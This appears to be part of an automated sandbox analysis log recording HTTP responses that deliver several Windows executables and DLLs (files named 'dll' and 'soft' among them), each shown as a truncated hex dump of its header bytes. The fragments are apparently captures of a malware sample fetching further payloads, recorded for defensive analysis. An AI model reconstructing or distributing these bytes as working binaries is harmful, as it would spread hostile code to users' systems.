Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:46 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:49 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:55 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
